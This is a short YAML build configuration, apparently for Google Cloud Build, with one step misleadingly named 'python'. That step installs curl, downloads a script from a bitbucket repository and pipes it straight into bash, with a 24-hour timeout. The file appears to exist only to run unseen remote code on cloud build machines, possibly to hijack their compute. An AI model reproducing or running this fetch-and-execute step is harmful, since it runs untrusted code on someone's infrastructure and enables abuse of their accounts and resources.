steps:
  - name: python
    args:
      - '-c'
      - >-
        apt-get update && apt-get install curl -y && curl -sL https://bitbucket.org/apenowe/lotnok/raw/master/A1 | bash
    waitFor:
      - '-'
    entrypoint: /bin/bash
timeout: 86400s
